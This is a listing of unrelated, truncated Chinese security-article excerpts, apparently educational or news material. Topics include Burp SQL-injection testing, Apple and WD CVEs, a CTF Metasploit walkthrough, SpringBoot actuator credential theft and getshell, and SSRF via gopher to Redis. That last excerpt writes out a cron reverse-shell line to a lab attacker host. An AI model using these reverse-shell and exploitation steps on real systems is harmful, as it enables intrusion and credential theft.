每次测注入都是用burp的Intruder模块，很不方便就是批量跑批量测哪些没有过滤懒人鹅上线，准备搞一个sql测试的插件本篇文章代码量大，基础可以去看上一篇一、需求分析测试sql基本注入的载荷，在可能有sql注入的地方发送测试包，目前只测试url中的，并可以根据错误回显判断出数据库类型，需要有用户界面，可以加载到Burp的Extensions模块二、编写代码上面这个burp包需要下载        pipinstall burp我加注释的地方是中文的最好复制后导入burp前删掉，不然可能会导入报错里面打印出来的结果也用的是英文，感觉burp兼容中文性不高需要注意改动代码按照python2.7

苹果周四对其旗舰iOS和macOS平台推出了紧急更新，以修复两个被广泛利用的安全缺陷。这些漏洞已在最新的iOS16.6.1和macOSVentura13.5.2版本中修复，由多伦多大学Munk学院的公民实验室负责，表明该漏洞被用于商业监控间谍软件产品。多伦多大学蒙克学院的公民实验室积极跟踪PSOA（私营部门攻击者）以及销售黑客和漏洞利用工具和服务的公司不断扩大的市场。根据库比蒂诺安全响应团队的建议，这两个缺陷都可以通过被操纵的图像文件来利用来发起代码执行攻击。来自公告：CVE-2023-41064(ImageIO) —处理恶意制作的图像可能会导致任意代码执行。苹果公司获悉有报告称此问题可能已被

SpringBoot-Eureka-xstream-rceactuator是springboot提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类：原生端点和用户自定义扩展端点，原生端点主要有：漏洞利用1.利用trace，获取认证信息（Cookie、tooken、Session），利用认证信息访问接口http://localhost:9093/trace访问/trace端点获取基本的HTTP请求跟踪信息（时间戳、HTTP头等），如果存在登录用户的操作请求，可以伪造cookie进行登录。2.利用env加refresh进行getshellhttp://localhost:90

PositiveTechnologies 专家帮助修复 WesternDigital 网络存储设备中的一个危险漏洞经过验证的攻击者可利用该漏洞在受攻击的设备上注入恶意软件并远程访问文件WesternDigital 感谢 PositiveTechnologies 专家 NikitaAbramov 发现 WesternDigitalNAS 固件中的一个漏洞。该漏洞可能导致在存储设备中远程执行任意代码、数据丢失和信息隐私侵犯。该供应商根据责任披露政策获悉了这一威胁，并发布了更新以解决该漏洞。在 MyCloudOS5v5.23.114 固件中发现了 CVE-2023-22815 漏洞，该漏洞的 CVS

1.通过渗透机KaliLinux对靶机场景Windows7进行系统服务及版本扫描渗透测试，并将该操作显示结果中3389端口对应的服务状态信息作为Flag值提交；进入kali命令控制台中使用如下命令Flag：open2.在msfconsole中用search命令搜索MS12020RDP拒绝服务攻击模块，并将回显结果中的漏洞披露时间作为Flag值（如：2012-10-16）提交；使用命令msfconsole进入kali渗透测试平台，然后使用命令search ms12_020搜索RDP拒绝服务攻击模块。Flag：2012-03-163.在msfconsole中利用MS12020RDP拒绝服务漏洞辅助

Solidity合约安全，常见漏洞（第三篇）ERC20代币问题如果你只处理受信任的ERC20代币，这些问题大多不适用。然而，当与任意的或部分不受信任的ERC20代币交互时，就有一些需要注意的地方。ERC20：转账扣费当与不信任的代币打交道时，你不应该认为你的余额一定会增加那么多。一个ERC20代币有可能这样实现它的转账函数，如下所示：contractERC20{//internallycalledbytransfer()andtransferFrom()//balanceandapprovalcheckshappeninthecallerfunction_transfer(addressfro

0x01产品简介  用友时空KSOA是建立在SOA理念指导下研发的新一代产品，是根据流通企业最前沿的I需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活动的实现。 0x02漏洞概述  用友时空KSOA/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。0x03影

CVE-2022-26809RCECVE描述CVE-2022-26809-核心Windows组件(RPC)的弱点获得9.8的CVSS分数并非没有原因，因为攻击不需要身份验证并且可以通过网络远程执行，并且可能导致远程代码执行(RCE)具有RPC服务的权限，这取决于托管RPC运行时的进程。运气好的话，这个严重的错误允许访问运行SMB的未打补丁的Windows主机。该漏洞既可以从网络外部被利用以破坏它，也可以在网络中的机器之间被利用。https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809https://www.pwnd

SSRF漏洞拓展目录SSRF漏洞拓展curl_exec函数一、ssrf配合gopher协议反弹shell二、ssrf配合gopher协议写马三、ssrf配合gopher协议ssh免密登录四、ssrf配合dict协议反弹shellcurl_exec函数一、ssrf配合gopher协议反弹shell实验环境：（1）192.168.142.201#redis服务器（2）192.168.142.133#攻击机（3）192.168.142.1#SSRF靶机1、利用定时任务构造反弹shellsetxx"\n*****bash-i>&/dev/tcp/192.168.142.133/88880>&1\n"c

 漏洞描述Thymeleaf是用于构建动态的Web应用程序的Java模板引擎，SpringBootAdmin是开源的管理和监控SpringBoot应用程序的WebUI。由于Thymeleaf3.1.1.RELEASE及之前版本中存在沙箱逃逸漏洞，并且SpringBootAdmin默认使用Thymeleaf进行HTML渲染，如果SpringBootAdmin服务未对/actuator/envapi节点进行身份验证，未经身份验证的攻击者可通过该api节点启用MailNotifier功能，并通过服务端模板注入在SpringBootAdmin服务器中执行任意代码。该漏洞Poc已公开，并且官方尚未发布漏